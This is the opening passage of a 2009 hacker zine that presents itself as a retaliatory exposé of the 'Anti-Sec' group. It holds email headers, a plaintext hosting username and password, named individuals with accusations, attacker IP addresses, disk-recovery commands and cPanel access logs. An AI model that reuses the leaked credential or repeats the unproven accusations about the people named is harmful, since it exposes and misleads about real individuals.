mirror of https://github.com/fdiskyou/Zines.git
11157 lines
580 KiB
Plaintext
11157 lines
580 KiB
Plaintext
__ .__
|
||
_____ _____/ |_|__| ______ ____ ____
|
||
\__ \ / \ __\ |/ ___// __ \_/ ___\
|
||
/ __ \| | \ | | |\___ \\ ___/\ \___
|
||
(____ /___| /__| |__/____ >\___ >\___ >
|
||
\/ \/ \/ \/ \/ *no more*
|
||
get yours http://www.network-science.de/ascii/
|
||
|
||
|
||
[0x00] [Introduction]
|
||
[0x01] [Forensics]
|
||
[0x02] [Target Profiling & Lulz]
|
||
[0x03] [ownage.net - prosec]
|
||
[0x04] [vitalspeeds - prosec]
|
||
[0x05] [makosolutions - prosec]
|
||
[0x06] [holeinthewallhosting - prosec]
|
||
[0x07] [darkmindz - zf05]
|
||
[0x08] [Backdoor RCE]
|
||
[0x09] [SEO Optimizing]
|
||
[0x10] [Reporting]
|
||
[0x11] [Attachments]
|
||
[0x12] [Conclusion]
|
||
[0x13] [Greetz]
|
||
|
||
|
||
_______ _______ _______
|
||
\ _ \ ___ __\ _ \ \ _ \
|
||
/ /_\ \\ \/ / /_\ \/ /_\ \
|
||
\ \_/ \> <\ \_/ \ \_/ \
|
||
\_____ /__/\_ \\_____ /\_____ /
|
||
\/ \/ \/ \/ hai:]
|
||
.___ __ .___ __ .__
|
||
| | _____/ |________ ____ __| _/_ __ _____/ |_|__| ____ ____
|
||
| |/ \ __\_ __ \/ _ \ / __ | | \_/ ___\ __\ |/ _ \ / \
|
||
| | | \ | | | \( <_> ) /_/ | | /\ \___| | | ( <_> ) | \
|
||
|___|___| /__| |__| \____/\____ |____/ \___ >__| |__|\____/|___| /
|
||
\/ \/ \/ \/
|
||
|
||
|
||
What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known
|
||
as "ProSec" contacted us with reports containing information about the entire group and how it was operating.
|
||
We don't know who they are, they appear to be well-funded and top notch security experts and what
|
||
they have done against the group is invaluable to us and others that they have and or would have been targeted.
|
||
ProSec did want me to portray a message that organizations similar to the Anti-Sec will and are currently being
|
||
targeted by the movement. ProSec already has access to a number of them and are continuously monitoring and gathering
|
||
more information about the various groups and will release information when applicable. No longer should whitehats
|
||
fear these groups, as soon as an individual is targeted, they will target right back. This is a warning shot to
|
||
those out there that target us. I want to thank ProSec for the work that they continue to do and understand why this
|
||
movement is so important to the security community.
|
||
|
||
On the 4th of June 2009, a group named "Anti-Sec" decided to expose Astalavista group after
|
||
they successfully exploited what was rumored to be a Litespeed 0day exploit which in reality does not exist.
|
||
After looking up on this more and more, a couple of days later we found out that the responsible
|
||
person behind this attack was a Saudi-Arabian with the nickname RoMeO, so we decided to let the other
|
||
Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators
|
||
decided to warn his friend RoMeO about it and as you will notice below Joao Pontes (rorkty) knew
|
||
from the beginning that Astalavista group was compromised by his closest friend and decided to do nothing about it.
|
||
Later, on the 9th of June one of my dedicated hosting servers, running a couple of websites was targeted
|
||
by the same "Anti-Sec" group providing fake and misleading information to the public.
|
||
|
||
The reason that we decided to start looking into this subject, was to see how and why my dedicated hosting
|
||
server was compromised despite the fact that it was secure enough to provide access to the outside world.
|
||
|
||
Below is a list of some security measures that had been taken to ensure no unauthorized access permitted:
|
||
|
||
1) Firewall Protection
|
||
2) Brute Force Detection and Prevention
|
||
3) Kernel Hardening
|
||
4) Apache, PHP, SQL Hardening
|
||
5) SSH Hardening
|
||
6) Wheel access group for su
|
||
7) Chrooted Jail Shell
|
||
8) Web Application Firewall
|
||
9) Network Intrusion Detection
|
||
10) Host Intrustion Detection
|
||
11) Hidden daemon versions
|
||
12) Rootkit Detection
|
||
13) DoS Protection
|
||
14) All private sites hosted, audited for bugs
|
||
15) Root Access Alert
|
||
16) Etc
|
||
|
||
Unfortunately the interval between compromisation of the server until the alert reports came to our attention
|
||
was not enough to prevent the attack.
|
||
|
||
After our research and the information provided by the ProSec group we came to the conclusion that the server was
|
||
either hit by an 0day exploit or through my dedicated server provider makosolutions.com which later on it shows
|
||
that they were backdoored.
|
||
|
||
Utilizing passive and active reconnaissance methods resulted to large information acquisitions which provided
|
||
us with means for linking together certain information and shade more light on who we are about to target and
|
||
research for the attacks that took place under the "Anti-Sec" label.
|
||
|
||
In this log file you will read a limited version of the information gathered and provided, since the most important
|
||
parts are being kept private in order to be analyzed by the proper authorities.
|
||
|
||
|
||
_______ _______ ____
|
||
\ _ \ ___ __\ _ \/_ |
|
||
/ /_\ \\ \/ / /_\ \| |
|
||
\ \_/ \> <\ \_/ \ |
|
||
\_____ /__/\_ \\_____ /___|
|
||
\/ \/ \/
|
||
___________ .__
|
||
\_ _____/__________ ____ ____ _____|__| ____ ______
|
||
| __)/ _ \_ __ \_/ __ \ / \ / ___/ |/ ___\ / ___/
|
||
| \( <_> ) | \/\ ___/| | \\___ \| \ \___ \___ \
|
||
\___ / \____/|__| \___ >___| /____ >__|\___ >____ >
|
||
\/ \/ \/ \/ \/ \/
|
||
|
||
|
||
Email Incidents
|
||
|
||
|
||
Delivered-To: glafkos@gmail.com
|
||
Received: by 10.223.104.212 with SMTP id q20cs268734fao;
|
||
Tue, 9 Jun 2009 03:58:03 -0700 (PDT)
|
||
Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200;
|
||
Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
|
||
Return-Path: <root@freehostia.com>
|
||
Received: from freehostia.com ([66.40.52.21])
|
||
by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02;
|
||
Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
|
||
Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21;
|
||
Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com
|
||
Received: from root by freehostia.com with local (Exim 4.63)
|
||
(envelope-from <root@freehostia.com>)
|
||
id 1MDz3p-0002ME-UX
|
||
for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000
|
||
To: glafkos@gmail.com
|
||
Subject: Hosting account: Password reminder
|
||
MIME-Version: 1.0
|
||
Content-type: text/plain; charset=UTF-8
|
||
From: Free Hostia <csupport@freehostia.com>
|
||
Cc:
|
||
Reply-To:
|
||
Message-Id: <E1MDz3p-0002ME-UX@freehostia.com>
|
||
Date: Tue, 09 Jun 2009 11:00:09 +0000
|
||
|
||
Dear Glask Chwat,
|
||
|
||
at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel.
|
||
|
||
We are sending you your account login details:
|
||
username: glachw
|
||
password: 1779586
|
||
|
||
If you have any questions, please open a new support ticket from the Help section of the Control Panel.
|
||
|
||
Best Regards,
|
||
Free Hostia Team
|
||
|
||
|
||
/*
|
||
Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor?
|
||
As you can see above, he made this request from his home IP.
|
||
*/
|
||
|
||
|
||
Delivered-To: glafkos@gmail.com
|
||
Received: by 10.223.104.212 with SMTP id q20cs272895fao;
|
||
Tue, 9 Jun 2009 05:26:34 -0700 (PDT)
|
||
MIME-Version: 1.0
|
||
Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue,
|
||
09 Jun 2009 05:26:34 -0700 (PDT)
|
||
Date: Tue, 9 Jun 2009 15:26:34 +0300
|
||
Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com>
|
||
Subject: Lol.
|
||
From: james knuth <james.knuth1@gmail.com>
|
||
To: glafkos@gmail.com
|
||
Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868
|
||
|
||
|
||
http://pastebin.com/m592e1f1c
|
||
|
||
It will be all over the net soon,
|
||
|
||
Enjoy.
|
||
|
||
|
||
// Indeed..
|
||
|
||
|
||
Server Forensics
|
||
|
||
root@srv01 [/home/recovery]# du -h --max-depth=1
|
||
608K ./APF_Backup
|
||
992K ./Diff
|
||
224K ./Latest
|
||
3.3M ./LinkNet
|
||
46M ./log
|
||
1.2M ./modbin
|
||
7.5G ./sdb2recover
|
||
361M ./sdb3recover
|
||
371M ./sdb5recover
|
||
121M ./Software
|
||
128K ./OpenSSH_Debug
|
||
4.5G ./Evidence
|
||
15G .
|
||
root@srv01 [/home/recovery]#
|
||
|
||
// Obviously this noobcake didn't know that it was possible to recover deleted files
|
||
|
||
|
||
root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string*
|
||
416K sdb2output.txt
|
||
7.5G sdb2recover
|
||
361M sdb3recover
|
||
7.9M sdb3usrdirlist.txt
|
||
371M sdb5recover
|
||
22M sdb5tmp.txt
|
||
64K sdb8deleted_files.txt
|
||
2.5M sdb8home.txt
|
||
857M stringfile_sdb2.txt
|
||
root@srv01 [/home/recovery]#
|
||
|
||
root@srv01 [/home/recovery]# ls -lad sd*recover
|
||
drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover
|
||
drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover
|
||
drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover
|
||
root@srv01 [/home/recovery]#
|
||
|
||
|
||
root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt
|
||
root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt
|
||
r/r 2195490: local/cpanel/logs/access_log
|
||
r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync
|
||
r/r 2362208: local/apache/logs/access_log
|
||
root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log
|
||
root@srv01 [/home/recovery]# ls -la /tmp/access_log
|
||
-rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log
|
||
root@srv01 [/home/recovery]#
|
||
|
||
// Someone needs to learn how to cover his tracks... try... "man dd"
|
||
|
||
|
||
root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54
|
||
188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/cpanel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/ssl.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
